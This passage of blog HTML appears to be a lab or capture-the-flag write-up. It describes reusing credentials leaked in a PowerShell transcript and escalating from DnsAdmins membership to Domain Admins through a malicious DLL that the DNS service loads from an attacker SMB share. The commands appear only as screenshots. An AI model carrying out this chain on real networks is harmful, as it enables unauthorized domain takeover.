url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEVElEQVR42mWVaXbbSAyEdZZkYm3cyeYmblooyZLjeJs4M/e/B+YDKHvyXn70I0U1q6sKBXB2l1/kLn+QRf0sUXOR4fgsva1XqYYHOVzfxXdb8aNSIjdInA/i6e/qIF7OtdzbdRm1Mg82MltXLxJkg7h6lGF8krp/kLw5S7Y5iePaH18krY4SAJKVJ6mHRw59kc3uUar+KnFxkDDfS1KN4qW9zJLhFw9HA9nfv9nmqruIl/Sc2kje3suK078sC/HniSRuZy8H2VaScmQdJComQN03i4d/YXPm5KuMl5926sKvZRW3tor+wrUDMBdv4SSHrR4SwSytj6g42fsORYsQyXH/LhGU9cH29CpbGOZs8rFhEd4Yxu0EOE8lzXdYMJoFMcz0Pion8HXSySxqXjH6IBknd/sfeHmSEDClvwgae74E2ADvUolTLcxO/KS1FWYdq8eCnv0wjPpfvHSSEiaH85vkGxgBtApbWQNadVfxIiQvJsAUZimMAgoQ632Bp1Q+cZ0svEIl/2MsqvYK4N/S7n4Y0BoQBS3bi/3+MncAJpLhnUNeqJKJS8pKNAEAG2CwIRblUYrmXrbji7TbR4CaiSUrx/A1wF9h6M8zGMII73wKFWulOSDCsrQ6A1iqh2/mYY53/f5JSoBX/kaWQWvACri6AXrfUomIk+73kx2+7WGqgBSGg+Zrh+TuHQlnJOPhCQ+5XyuYASKZ7jGGcxjeZZIBkJVnCdP9jdkJhSfYkgq/ItjqYakeXqwodfdgALoUdALsPgFzbYKaHAKcFEfJIJCyzEMF9Ktn/hilIIfD4WnyUP1Dtl7djfEHYIrMFKBAGbrJP5Wc4uVCJfvVkwGqVPVwA0Pz0BaASFoZIK135yTRQuQA4mEEuLbtBHpgn+awu+WQYuzpEocfXjgVRGVrnLxPyc48dFRU2YXZTTa/E2xbRf3kYcopFYE+HN+k7R+RuLl52PzhoUOeso4d7NRH2KYUSb2c+8qwJof0cs6mYUdstFM8/PMbk6Bx+sPDUj3c3gBHYsRyIxbptKlfATxIwaYtgCr5f8BmitFnbBy9vDWQkGuY7iamlsODeT2Lm582kurmJnlL6wG0vgGqt7/n0GKjHsJUgTVyWnU92ACT9l0y/qjNw1dp+u8GtrbofAA2v3l4sJdjla5+AmigPNchgofP4jSHeLhlrKski403rYz/FNh6mdZLVDLPgmRrsj+KE2U7i9lszB5kx4Q+M9teCPcjH51+5aRj5HerXK7Mvn5VSPE1kobnx7STM7NvD+uRAXFiPh7p73vy2a4ZDoH7IQHICSOqZRDknBgxygMqHMC0wYoQ+XffMgkYYQWJKJnSKQCOgVDyXSlUIZID9s0ShoN6UtPLR3q5VHMB0izqtbCByzykwv5fyS3YOtV1sGqERvsq6hhbWg7L7zY0Cx72fIczTlpCfbmubGmrLb3airKCZUg3hPin3eNzHyTDtGI+AV4t/wGGLzzFZnDzOgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="melanie logon success" title="" src="/static/8ed65f3d86cc734fe8b780c7ef7d3a8d/50637/melanie-logon-success.png" srcset="/static/8ed65f3d86cc734fe8b780c7ef7d3a8d/dda05/melanie-logon-success.png 158w, /static/8ed65f3d86cc734fe8b780c7ef7d3a8d/679a3/melanie-logon-success.png 315w, /static/8ed65f3d86cc734fe8b780c7ef7d3a8d/50637/melanie-logon-success.png 630w, /static/8ed65f3d86cc734fe8b780c7ef7d3a8d/14945/melanie-logon-success.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials granted read access on the <code class="language-text">SYSVOL</code> share, but I didn't find anything useful there. So next I tried making a connection using <code class="language-text">evil-winrm</code> and was able to obtain a shell as <code class="language-text">melanie</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 513px; " > <a class="gatsby-resp-image-link" href="/static/ee2d56d23f66a896de4720245f2d8ddd/bb9ec/evil-winrm-melanie.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.75949367088608%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACLklEQVR42lWT63KbMBSE/SaJuRokrgKBMNg4vuG46Y9OO+30/d9ju1Iaz/jHNxJC7Dm7Equ4HBHrD4TdL0T9b4TNO/J2xnL/8+D+/S+Oy09crj8wjFdESYcwNRCyf7BJewSbHqso3yOqb+SCuLHjGZt8QmsWaNKaC2p9QlJwrZmg1RYiM4iyLVRl0Pwny6xgh1UgdwjEhCA/IZB7+OkMPzZ4jQxevNLx6ldYBzVefIvCOmzghQqvQQsv7rAmPnGCkWCH6Y4tT0jEG9L8gKS6QqgbBO1LIti9YOdSf4NUC1J15/wDopgpop3QF6teHTD3F8y0dWxPOO9OaDmv2gtUd0XTL7R85sg5I2jMDbk6Qm/v7n2YdM+CmnnsqwlTNmCWBiczoNMH5ndFx/zMeIPu7bg4uu2CsrFOtmSEHm4sxvzFQNsaq4xZ5H6JitTMq80q5MUIxa4UO7WHYsemO7si9jmvZycQJj3jMo6vTldB3Lpqst5DlsxSbpEQWezIBMkTF8Q9830senhR82TzyfKaJ5hwU1ntUVT8KB/IiKI+UGhERhFB4azco6JVwe6t4Dr8PG3Lc4b0X1DM47UIbGXisUhMO9aitV63Rye8Dhr4UessuygYg8WuPQRV+4aKG6xQSPsxb7xgBI0+ohsWF7gZ352o+5DBp4xAO0Gb8RkJL7nN0wmmckBGG5G9TxRNhEFNa1bQ/k4RN+Z0YC37kXaCHm3aQ8i4brvNa3uXPwX/AZ5ffxGVpbboAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm shell as melanie" title="" src="/static/ee2d56d23f66a896de4720245f2d8ddd/bb9ec/evil-winrm-melanie.png" srcset="/static/ee2d56d23f66a896de4720245f2d8ddd/dda05/evil-winrm-melanie.png 158w, /static/ee2d56d23f66a896de4720245f2d8ddd/679a3/evil-winrm-melanie.png 315w, /static/ee2d56d23f66a896de4720245f2d8ddd/bb9ec/evil-winrm-melanie.png 513w" sizes="(max-width: 513px) 100vw, 513px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After looking around on the system, eventually I found a hidden directory, <code class="language-text">C:\PSTranscripts</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 626px; " > <a class="gatsby-resp-image-link" href="/static/213085ef692d8a79e90de6bf54d0f906/2c45b/PSTranscripts.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 59.49367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACB0lEQVR42nWT23qaUBCFeZQGVEQBOSMKCIISo9EkPaS96fu/xeqaMWlrDxfrg29v5p+ZNYPh2yn8SYxwHCP2IgRRBTeo4YUNgrjFeJpj9F8tVZbIucqwnBxu1MBj8GxRw56vYE4SmOOrrGl2C7H/hlq/QQ17XsBxV6op3yezpVZl86nvzq/gsSNnhT7/WSVlJMsdJgwy2fJoksKiwqRDuhwgd0HSsuJUQWkxqKK016QCNieZymLlV2DOoLiBOYox80qs6xOqzaMGlc0jivKgFkiwzS5CntfbJyYbkK3u1W832GDqrhVq5MUei3ADixW69LDff8SGAYuoRbk5qa7AHHf0VIa1O7yi7p4I7+DzO58zmPklgdkV6PprBS54MRy+YLt7YasdGgbV7VlBAjRlIwg8Hr+h719QVw/aiVQoScVTBQaRtBzBZ/n7+88KlA832wtqtv0O/EBgFdb43l/wtTvjOWsRSSJn+XO9jII+hPEV6C0q7IdPCpSWq+ZMETh6A7ILST7wfiUDSraIqJhziLJeV04r9INKWxZg213QsLI5/VxVRw7opMAR/ZnTJwne0ueAoDtO/89lN5arAXHKSyt8a5kV9s/w+F5y2mUtwJiwCjmrkrPh+MpkDzr5250kUKqaezKUBDbbkvaDiGvApfZotk/JbsowfG6DWCHT9fT3rAm5/ZN+AElNgW7hDfckAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PSTranscripts" title="" src="/static/213085ef692d8a79e90de6bf54d0f906/2c45b/PSTranscripts.png" srcset="/static/213085ef692d8a79e90de6bf54d0f906/dda05/PSTranscripts.png 158w, /static/213085ef692d8a79e90de6bf54d0f906/679a3/PSTranscripts.png 315w, /static/213085ef692d8a79e90de6bf54d0f906/2c45b/PSTranscripts.png 626w" sizes="(max-width: 626px) 100vw, 626px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">PSTranscripts</code> contained a PowerShell transcript:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5482154dba6d060589de823336979453/b217e/powershell-transcript-log-file.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwUlEQVR42nVS226rMBD0pzQBjCHmYsAYkpCkpGmlnv//nj0zpo0qVX0Y+QKenZ0dFXQvZ9PJyc/ijx8yXz7lCEznT+nGu1h3kbSYgPBEYrwkeS+J7mQPJOBIctzpQVRZnYQwdpZDu2xoFskPs2Qgyu1RsnICQFSMeDh8AXvDu/kJkqvKXaWCirI+C/e2vURkxUawj2qwUgEBktRMWIHiGyBDkb12ojIzRql7QJezDOEdrT6k7l8jCdX6+SPeUXWS/0GYOaxeFFvaaS8lHvbjm7T9Ku1wFzessst6PA6w4yR9eMgwvceiyV+E8FXVUOHMIK6dxPm7NFBWRxuukbhDkfxwjH4SVPdbIc8jBDSiOhB6EHZtiI89VAzhLSpiq7TANlcUuUVf058e/iJFy1V/QzSuUlQYSouhNNuUqZBtk2SX0WP/RRaeKtOfhOXWutJ4oCE3xSQ1Pjh6iLYt4sMWC0SK6iyKkYzEG9gioDe84G6HgSmLuJCMseFQRrRJDNMjDoUDmZZ/Mej8zkhVKFB1N3i8wvMV+1UcUnCANSrMiAnabvATA55BBcGIpIwUoLE3SENZL7EA7SF4LuN+iWTGnuU/E8VXCkpwixUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PowerShell transcript log file" title="" src="/static/5482154dba6d060589de823336979453/50637/powershell-transcript-log-file.png" srcset="/static/5482154dba6d060589de823336979453/dda05/powershell-transcript-log-file.png 158w, /static/5482154dba6d060589de823336979453/679a3/powershell-transcript-log-file.png 315w, /static/5482154dba6d060589de823336979453/50637/powershell-transcript-log-file.png 630w, /static/5482154dba6d060589de823336979453/b217e/powershell-transcript-log-file.png 743w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The file contained a recorded PowerShell session for the user <code class="language-text">ryan</code> and one of the commands revealed a username and password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/f2f9b/cat-transcript.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 88.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAADB0lEQVR42nVUyXbaQBDUpwQMQmhH+76y2IBtsJP4kv//jUr1CONDnEO9bo00perqntGydESdblHHDQLCS7awww5u3DEfscl2MDcN/HTK7bBV607UIcx3/G6An235bsv1AVo1vqIaXiAxqY9Iqkf4fCGka7/CzIjxYKaYrxOFr5zRSO7r8p1ErSZZ0Z3R7a84Xv5ge/yNgGqWVoYFcSdglHxmfBF/B204vKPdXbEj0fbpF/r9G8r+TLVPSJsjUkbJY1HOH4lyh/j82T+EHQnq8YUkz0ppQD9d+mN4FUuu75Bn3c6xcktlxX8Jm/GiCIv2rEjFP1FgBw3WJFHEEknkBK3C0mTZqxAPRkTcojnZoEmJ3faCguVl9Qkt84rElldzYwbdyqGbucrFV4kL8XQVKVIFfUP4zANo+5t3h9MHxsNPlN0zNhwLk6pk44LdfJAmSLdFySq6KZue57oQBpgvSbj0pORX1IOAo9PRS/oYct4iwrALbkq+AcmUsgnTT6Z1LaueWKKQnZW6pDgg4HDH2R4hG7QiqWAtzSBWbIwQzHXOnSHqsztEqSIc9u/oOTr97g0Nyfvd+7RGFO0JZfuMhlXIt3F+gBfydMQ8HckOls+Tw9znibG8HFrO0yHejdx8OH6gG69s0htadl/iXta2V6XYC3v4JLP9jh43bFKBBRu2MIup7HUErWhOakNLBYJmuCBK90jLR7gcEZsbnYDH0C4VienW3JzixzLGbJXcwBO0DDFbuNDKht4pnFBwbHKWFcQjQnba9jmLTqVITJezaImX8tzA3kwq7UBmtuewN2wi57BiI6TsiDdHxpiyKZtoIOlwK69VCoVcSC2SWF5L9b3yz+E3LmFtWph81qQRgww3x6ejb9IUUZixZBnu2TK6Qzo70z+f2WU9UaUr6AK5bTguQtiTrKV/bf+KomL5tCDlhSDkcf5IK6i+PLI5B6XWotq1U6vyDUZRa1K5lkY9Trw0T7wQzpy7M2+UU9yjlEuBp8V0Sm6up5Kp+O6pU6lcYNiVskHI/wK2pUus+UDwtAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat log file" title="" src="/static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/50637/cat-transcript.png" srcset="/static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/dda05/cat-transcript.png 158w, /static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/679a3/cat-transcript.png 315w, /static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/50637/cat-transcript.png 630w, /static/c5bfeb0f51b9d5dc771fbd2b5a10dce2/f2f9b/cat-transcript.png 744w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the credentials, I was able to use <code class="language-text">evil-winrm</code> to get a shell as <code class="language-text">ryan</code>. The user was a member of a non-default group, <code class="language-text">Contractors</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 560px; " > <a class="gatsby-resp-image-link" href="/static/87f40184f0aef536c81d804ca2f774b3/360ab/evil-winrm-ryan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 100.63291139240506%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAADaUlEQVR42m1U2XKjSBDkS2xLXJK4aaARp5AEsmyNvaGdmdjY/f/vyM3CTMQcfqhoaJokMysLw41bOPkNtv4GR99hp0c0ww3Xt39xfv6G1/f/MFz+xni5Iy1PsHYaW7/ENiixC0tsfM0q4OwKmJsMhpMc4agL3PxlLicekOgRunlBXl24XuGlPfK8RRDXsIMKcaRZOVScIw4zREGG3U5h5aQwrKCDFfSwojPXA0yvx2pT4cHO8WileDATPNmK1wpPTsaXltXNueY8q1kl1lsNc1vAcP0e7q6hjIEyBvhqxFZN8LIrdukFfnbheub9K7bxCX7xhm06UZ6GtSlgEcR0FUwnwZplNMUJR0o750eM5RF1UVHyhLJ9RVE9Q9eUXl9R9V8QZSeU3Q2qnLChdMcjMzI2ydYkS3OzJ+B+RMs6189QNDeNNfy4R6zINuoIdEN/+gtZOSLkXkA//aRDJNdcTVeY7j8AtyUMMb8Z3qH2Ex5tMZa+2Bm/XGBF3/yE4GQvAFKut8cT99c8tyYzi0DWzG4B3FNa1VIWZcjqRy29ZDfpkZTrVYxFzYhwn6sfd/DI3N3tCaT/BOwo5zTdMYx3XG//0LNnSulnMGEqH+yGt4XhEUl+QpQOzN0ngCxDDig2Rl5Q+kwGLYEUbIkBZQm4Ks68L2cAAbJZvwP+ADUkvA2NF2ZifE4vRY7tFvSJoc04OYcv3L8gTA88MyHlB8Qak2d+Z2nUjMP08h2y9qd3jttXhGS1srKZqeLUNHyminFhO1I2cxn+CShllBytA4FkFa+G8x05cyhNEtnS4Tgb5pdFtsOyl/oA07+AGgUlZpQgAAlNF79KBlk6Kh6KTC9q5pj8CvBZEbDpXtEs7AqCCgMxXMCsmdXHiImfwvLn+gzUaHsCdi/ofwKUQAuYlNwLw4D5k3xKBndhw2xWn4Iaih5ljM6eXfZ4aBvwMMMsYHNsOIYSJ/FRIhWz6yFzKE2ZFSwDYP8AjFKZ2wP9OyDmtXia8iV7AfT4ATn8aCVz1yXssv/E549LPbh6/o3NgCVzKFXTx5qjdzi+o2UuJSrCQJqT8AMiWRq04Syv6GnG39YU1jjSjimsUHBPQA1NRhXBeoa3ZHgFUIBlrqX7Bffaw9sMKH8f+Tms+XK0ydH5ezQE7WhVyuatNxr/A2rpf9Zp59B4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm shell as ryan" title="" src="/static/87f40184f0aef536c81d804ca2f774b3/360ab/evil-winrm-ryan.png" srcset="/static/87f40184f0aef536c81d804ca2f774b3/dda05/evil-winrm-ryan.png 158w, /static/87f40184f0aef536c81d804ca2f774b3/679a3/evil-winrm-ryan.png 315w, /static/87f40184f0aef536c81d804ca2f774b3/360ab/evil-winrm-ryan.png 560w" sizes="(max-width: 560px) 100vw, 560px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I ran <code class="language-text">whoami /groups</code> and noticed that the user was also a member of <code class="language-text">DnsAdmins</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/95449b6221ed6e414b20bed5646003ae/14945/whoami-groups.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 64.55696202531645%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACcElEQVR42j1T13LbMBDkn8SWzCJT7CDBXtW7o8w4L/n/z9gsQI0fdg44Aou926PhewXidYEsKCDSBn46IUhHhHJCRHhi4H6ALzqE2QDzM8PCSbBYpViuMiw/JZG/ooSR5FuI6gDZnBFlE97MBO+WgphhpyTIdHwzYyxsgQ+HOYtrK+IZwlYPzOSGF/dI5AZu2MDxSqgH4myDlV9zX8GmevXNDSt8UJVS6EUNbFfCWgmYTgyLsP0SFs8aGdXV/RWSMSv3KLsLKkLtda7a66jzPJc3R57bIWc+zTeQvBOKXj/oBBWMkD1TihyymyvJjwPWUQsv7rAm/KSHrI985AyhCXbcn5CWR5huxT6WbEOKXwsP72bIHrJcwTJVqRHJu+lLK5zVnH7WZXvGOuzY5y3V3lGPdxo1kVCylyH79+phTCOEJCFR1Gdc7v8w7p6YDn9Y7hEFzar7GxoiiEee26Ma7mjGB93fYGnPBi3dYiYMWJLQ6kbkJGx5MEwGrdanYQHXksQNScrmQnU3FN0VKXMfnyThBGiFbq7Hxwh4KSt22uk036GfHnOZRMiSIiJnzzRhe9Fqi/aKjLmFKtchzEj3b+kIElKJcjqkMTEJd6dvdON8WREmzFdU1G9+66gqqIcHlV5hexwtnyO0rmBRnckxMs7DDc/zX+zZeLVuaUTwKnkmpAlUpHroBi3z6oGbRlLskfNhoeMVamKMC0fhe/uFB118kmxgKUpxzlEJBH9BMeqSaxLI8qBNUuorEqTFUY+PqlIpdajY8KkmoBKPMSkOurSWSpuBfSKBmlEVVU/VOmW/lUk1S3b9lr+jclnOsCX+A9nprtr3RO4bAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="whoami groups" title="" src="/static/95449b6221ed6e414b20bed5646003ae/50637/whoami-groups.png" srcset="/static/95449b6221ed6e414b20bed5646003ae/dda05/whoami-groups.png 158w, /static/95449b6221ed6e414b20bed5646003ae/679a3/whoami-groups.png 315w, /static/95449b6221ed6e414b20bed5646003ae/50637/whoami-groups.png 630w, /static/95449b6221ed6e414b20bed5646003ae/14945/whoami-groups.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This was due to nested group membership since the <code class="language-text">Contractors</code> group was a member of <code class="language-text">DnsAdmins</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fcacb5415ae779d1b0df29cf7ad19cf7/71592/contractors-group-membership.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyElEQVR42l3PyXKDMBAEUD7F7HgLIMSAZIwCXiqH2Mn//0y7ZewccnglqaqnpxSovcWgJ4x0kAHWfWM8/eA43Xn+wvH+oRyqdoY2V9RyRtNf6QKxFyj5xK60qLVjbkRQyQnpziLa9AhzQVIsMr7TtdchylsS0sw0WKU1VomnEKYaEfN+Niw6BMfphu7wBc2Njcwo1YR95RD7cpbFlDz1JIiLlgv92yw2hpn+hYUVv6q7M7blgHxrkDOQ0TL0UvzH4be/MoMoU3gAx4l9tWL7O2cAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="contractors group membership" title="" src="/static/fcacb5415ae779d1b0df29cf7ad19cf7/50637/contractors-group-membership.png" srcset="/static/fcacb5415ae779d1b0df29cf7ad19cf7/dda05/contractors-group-membership.png 158w, /static/fcacb5415ae779d1b0df29cf7ad19cf7/679a3/contractors-group-membership.png 315w, /static/fcacb5415ae779d1b0df29cf7ad19cf7/50637/contractors-group-membership.png 630w, /static/fcacb5415ae779d1b0df29cf7ad19cf7/71592/contractors-group-membership.png 664w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The DnsAdmins group has privileges specifically designed for the management and administration of the DNS service. Therefore, a user that is a member of this group can configure the DNS server to load a custom DLL that runs as SYSTEM when the service restarts.</p> <p><a href="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins" target="_blank">HackTricks</a> provides some more info on this type of attack, including an example of a valid DLL <a href="https://github.com/kazkansouh/DNSAdmin-DLL" target="_blank">here</a>.</p> <p>So I started up a Windows VM and cloned the valid DLL repo mentioned above. Then, within <code class="language-text">DNSAdmin-DLL.cpp</code> I modified the <code class="language-text">DnsPluginInitialize</code> function to add a new user to <code class="language-text">Domain Admins</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f39d0fd5486c1f098062f373d2dcb557/d0595/DNSAdmin-DLL.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.88607594936708%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByklEQVR42p1T2W7cMAzc7yhWkq378CHZji1vijT//1NT2rtF2rRAkX0YkBwKxFAkL1prpJTgnUOODk4rcM4hBD/tV3FRSmHMI7oUUYeA3huw6xWcsb8ei0+++MSdBTlv4JxFiD2GoSKEAk++ocLXKwOjwld6eH1YdoDdecbZnT/9R8HsLaZlQ40TtmHGVhbUMmPNM0bvEamDoZXo25YgkZoGXkt0Up3cIO+5RF21R8FtjQilx769YC0D3reMt3XE2zLiRphzwtIl1LHDnnvcCPOYsJE94j54OKsRqZgipZeX2SIS+X7bkbuAHAxKsCik/LC9MwRLaimO98EdXQ3ED96d+UTxoVIfCounoRhKNCS7kfBCIjYKgRCJi1wgCYHA/0R8IB2W8iPBUPuX1lj4/Yap7ChLxQv5S60oa4VSmj6fJs7ZB9jv/sd0fw3qIpWEpV0MtkMXM/pYEFyCYN/+uTr/3cOmVVApwxsP5SJMGuGHDE1cK9VDzRcKcloDQxOe6g/UesP+WjHNI4y19EA8oZDaavsI933FuiyY5wkxBhhjnjs9TbdrfUAaC6apnih5gSWFQjyhsKX9UXQButFQ0kBpDymPe2ZPKfwJHXqN2sxf3UMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DNSAdmin-DLL" title="" src="/static/f39d0fd5486c1f098062f373d2dcb557/50637/DNSAdmin-DLL.png" srcset="/static/f39d0fd5486c1f098062f373d2dcb557/dda05/DNSAdmin-DLL.png 158w, /static/f39d0fd5486c1f098062f373d2dcb557/679a3/DNSAdmin-DLL.png 315w, /static/f39d0fd5486c1f098062f373d2dcb557/50637/DNSAdmin-DLL.png 630w, /static/f39d0fd5486c1f098062f373d2dcb557/d0595/DNSAdmin-DLL.png 753w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After building the solution, <code class="language-text">DNSAdmin-DLL.dll</code> was generated. I then transferred it to my Kali machine and started an SMB server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3f9fa59e154ff11075e5bcf4ad0427ea/24e04/start-smb-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABPElEQVR42m1R7XKCMBDkUWpVDKAImA+EQAAVtVbUdvr+j7K9oFan44+d21ySvd3ECdIWXn4GU0ewpEKybCFMB1WdIIs9rTcYzzIMPYmhr15AYvQEp5QGOV3KxQpZlCFYbOHJD/hyDz/S8Oa6v/hOgleIJ35fCxp4heOGGkx8whUdGF+jWHUodj8o1h10Q05LEo9LjKdLuOSU0QA3zHo+CfMbbJ960xROrDbg5DBRBjEvEAuDUNQIEkMo+xqp1YPLNe03mC2q/tyMW1SYE/ejHM5iuYWuT6jab5jNGUV9gNItVLGDJreK3tG6TM0BQu+gqObUt9wOss7fJhwDxvvoDk+3FPNCghdk1RF1+4WQ3LhB2sezcf6i3WKy+ZXb2CM6d/8cC0c3Z7JakuUGQWyo0lTaGLD/j/8az2JW8Bf0huGGtSX7nQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="start smb server" title="" src="/static/3f9fa59e154ff11075e5bcf4ad0427ea/50637/start-smb-server.png" srcset="/static/3f9fa59e154ff11075e5bcf4ad0427ea/dda05/start-smb-server.png 158w, /static/3f9fa59e154ff11075e5bcf4ad0427ea/679a3/start-smb-server.png 315w, /static/3f9fa59e154ff11075e5bcf4ad0427ea/50637/start-smb-server.png 630w, /static/3f9fa59e154ff11075e5bcf4ad0427ea/24e04/start-smb-server.png 712w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>From the target machine, I ran <code class="language-text">dnscmd.exe</code> to configure the DNS server to load <code class="language-text">DNSAdmin-DLL.dll</code> from the remote UNC path:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/43f73959a15d105fb03a251e21dd2c48/3c0d4/dnscmd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.025316455696203%; position: relative; bottom: 0; left: 0; background-image: 